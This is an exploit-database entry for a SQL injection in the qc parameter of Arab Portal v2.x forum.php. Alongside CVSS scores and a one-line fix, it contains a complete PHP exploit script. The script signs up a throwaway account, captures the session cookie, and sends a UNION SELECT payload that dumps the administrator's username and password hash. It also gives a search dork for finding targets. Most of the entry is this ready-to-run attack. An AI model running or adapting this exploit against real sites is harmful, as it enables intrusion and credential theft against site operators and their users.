Arab Portal v2.x (forum.php qc) Remote SQL Injection Exploit

2009-08-18 / 2009-08-19
Credit: rEcruit
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<? /* [ Arab Portal v2.x (forum.php qc) SQL Injection Exploit ] [-] Author : rEcruit [-] Mail : recru1t@ymail.com [-] Download : http://arab-portal.net/download.php [-] Vuln in ./forum.php Line: 1503 [code] if((isset($apt->get[qc])) &&(!isset($apt->get[qp]))) { $qc = $apt->get[qc]; $result = $apt->query("select name,comment from rafia_comment where id='$qc'"); $row = $apt->dbarray($result); $apt->row['quote'] = "\n\n\n[QUOTE]..... :".$row['name']."\n".$row['comment']."[/QUOTE]"; } [/code] [-] Debug : [code] $qc = intval($apt->get[qc]); [/code] [-] Note : Path to Control Panel "/admin/" . [-] Condition : magic_quotes_gpc = Off */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function Usage() { print "\n\n"; print "/------------------------------------------------------------\\\n"; print "| Arab Portal v2.x (forum.php qc) SQL Injection Exploit |\n"; print "\------------------------------------------------------------/\n"; print "| [-] Author : rEcruit |\n"; print "| [-] Mail : recru1t@ymail.com |\n"; print "| [-] Greetz : Evil-Cod3r , BlaCK MooN , Fantastic Egypt |\n"; print "| ALL Sec-Sni.coM Members |\n"; print "\------------------------------------------------------------/\n"; print "| [-] Dork : \"Powered by: Arab Portal v2\" |\n"; print "| [+] Usage : php Exploit.php HOST PATH Options |\n"; print "| [-] HOST : Target server (ip/hostname) |\n"; print "| [-] PATH : Path to Arab Portal |\n"; print "| [-] Options : |\n"; print "| =>Proxy :(ex. 0.0.0.0:8080) |\n"; print "\------------------------------------------------------------/\n"; print "\n\n"; exit; } function Send($Packet,$Payload=false) { Global $host,$proxy; if(empty($proxy)) { $Connect = @fsockopen($host,"80") or die("[-] Bad Host ."); }else{ $proxy = explode(":",$proxy); $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy ."); } $Packet .= "Host : {$host} \r\n"; $Packet .= "X-Forwarded-For: 127.0.0.1\r\n"; $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $Packet .= "Content-Length: ".(strlen($Payload))."\r\n"; $Packet .= "Connection: close\r\n\r\n"; $Packet .= $Payload; fputs($Connect,$Packet); while(!feof($Connect)) $Response .= @fgets($Connect,2048); fclose($Connect); return $Response; } function SignUp() { GLOBAL $username,$password,$email,$host,$path; $Payload = "username={$username}&password={$password}&password2={$password}&email={$email}&email2={$email}&homepage=http://&viewemail=0&showemail=1&html_msg=0&usertheme=portal&spam=regnotspam&remain=279&post={$email}&left=279&I1.x=72&I1.y=6"; $Packet .= "POST {$path}/members.php?action=insert HTTP/1.1 \r\n"; $Packet .= "Referer: http://{$host}/{$path}/members.php?action=signup \r\n"; return Send($Packet,$Payload); } function Login_Packet() { GLOBAL $username,$password,$host,$path; $Payload = "username={$username}&userpass={$password}"; $Packet .= "POST {$path}/members.php?action=login HTTP/1.1 \r\n"; $Packet .= "Referer: http://{$host}/{$path}/forum.php\r\n"; return Send($Packet,$Payload); } function SI_Packet() { GLOBAL $host,$path,$cookie; $Packet .= "GET {$path}/forum.php?action=addcomment&id=1&qc=-999'+UNION+ALL+SELECT+1,concat(0x313a3a,username,0x3a3a,password,0x3a3a)+FROM+rafia_users+where+userid='1 HTTP/1.1 \r\n"; $Packet .= "Host : {$host} \r\n"; $Packet .= "{$cookie} \r\n"; $Packet .= "Referer: http://{$host}/{$path}/forum.php\r\n"; return Send($Packet); } function getCookie($Packet) { $lines = explode("\r\n",$Packet); for($i = 0; $i < sizeof($lines); $i++) { $line = $lines[$i]; if(ereg("PHPSESSID=",$line)) { $cookie = str_replace("Set-Cookie","Cookie",$line); break; } } return $cookie; } if ($argc < 3) Usage(); $host = $argv[1]; $path = $argv[2]; $proxy = $argv[3]; $username = "user".rand(0,10000); $password = "pwd".rand(0,10000); $email = "email".rand(0,10000)."@yahoo.com"; Print "\r\n[-] Connecting to {$host} .... \r\n\r\n"; SignUp(); $cookie = getCookie(Login_Packet()); $data = split("::",SI_Packet()); Print "[-] Username : $data[1]\r\n"; Print "[-] Password : $data[2]\r\n"; ?>

References:

http://www.securityfocus.com/bid/35914
http://www.milw0rm.com/exploits/9320


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top